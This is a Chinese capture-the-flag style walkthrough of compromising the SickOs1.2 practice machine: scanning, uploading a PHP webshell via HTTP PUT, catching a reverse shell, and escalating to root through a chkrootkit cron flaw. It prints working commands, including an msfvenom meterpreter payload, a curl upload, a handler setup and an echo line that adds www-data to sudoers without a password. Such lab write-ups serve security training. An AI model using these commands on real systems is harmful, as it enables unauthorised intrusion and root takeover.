SickOs1.2 靶机渗透
2021/11/10 6:41:20
本文主要是介绍SickOs1.2 靶机渗透,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
靶机记录--9
目录
1.主机发现
2.端口扫描
3.版本信息,操作系统扫描
4.漏洞查找及利用
访问网站">1> 访问网站
22端口尝试ssh登陆">2> 22端口尝试ssh登陆
目录扫描">3> 目录扫描
查看该目录支持的方法">4> 查看该目录支持的方法
> nmap探测">1>> nmap探测
> burp抓包探测">2>> burp抓包探测
写入一句话木马">5> 写入一句话木马
蚁剑连接">6> 蚁剑连接
getshell ">7> getshell
> 将kali自带的反弹shell脚本复制出来">1>> 将kali自带的反弹shell脚本复制出来
> 搞到蚁剑里来">2>> 搞到蚁剑里来
> 访问反弹脚本">3>> 访问反弹脚本
> getshell">4>> getshell
提权">8> 提权
> 先查看内核版本和系统版本 ">1>> 先查看内核版本和系统版本
> ls -la /etc/cron*">2>> ls -la /etc/cron*
> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)">3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)
> 利用chkrootkit,添加当前用户www-data到sudoers列表中">4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中
提权成功
getshell方法二
1.主机发现
2.端口扫描
有开启22,80端口
3.版本信息,操作系统扫描
OpenSSH 5.9p1
lighttpd 1.4.28
4.漏洞查找及利用
1> 访问网站
未发现可以利用的东西
2> 22端口尝试ssh登陆
root/root 登陆成功。。。但是这不是练习目的
3> 目录扫描
找到一个类似上传文件目录的东西
4> 查看该目录支持的方法
1>> nmap探测
nmap --script=http-methods --script-args http-methods.url-path=test 192.168.129.223
可以看到,该目录支持PUT方法
2>> burp抓包探测
还可以用options 去探测其支持的方法
5> 写入一句话木马
直接就在上面那个包里修改,,201 创建成功
6> 蚁剑连接
7> getshell
1>> 将kali自带的反弹shell脚本复制出来
2>> 搞到蚁剑里来
修改ip+端口(有限制,用443)
3>> 访问反弹脚本
4>> getshell
kali这边提前监听
8> 提权
1>> 先查看内核版本和系统版本
2>> ls -la /etc/cron*
在/etc/cron.daily 目录下,创建脚本chmod +x 给与执行权限,每天会自动执行
3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)
找到 chkrootkit 存在本地提权漏洞
看一下那个txt文件
里面大概意思就是,会定期以root身份执行/tmp/update文件
4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中
/etc/sudoers 该文件允许特定用户像root用户一样使用各种各样的命令,而不需要root用户的密码
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
提权成功
getshell方法二
1> 利用msfvenom生成一个php木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=443 -f raw > shell.php
2> 然后将其传到靶机
curl -v -H 'Expect:' -T shell.php "http://192.168.129.223/test/"
3> 在msf上开启监听
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.129.129 set lport 443 exploit -j sudo netstat -plnt
4> 访问上传的脚本
5> 然后msf这里
session -i 1
这篇关于SickOs1.2 靶机渗透的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23增量更新怎么做?-icode9专业技术文章分享
- 2024-11-23压缩包加密方案有哪些?-icode9专业技术文章分享
- 2024-11-23用shell怎么写一个开机时自动同步远程仓库的代码?-icode9专业技术文章分享
- 2024-11-23webman可以同步自己的仓库吗?-icode9专业技术文章分享
- 2024-11-23在 Webman 中怎么判断是否有某命令进程正在运行?-icode9专业技术文章分享
- 2024-11-23如何重置new Swiper?-icode9专业技术文章分享
- 2024-11-23oss直传有什么好处?-icode9专业技术文章分享
- 2024-11-23如何将oss直传封装成一个组件在其他页面调用时都可以使用?-icode9专业技术文章分享
- 2024-11-23怎么使用laravel 11在代码里获取路由列表?-icode9专业技术文章分享
- 2024-11-22怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享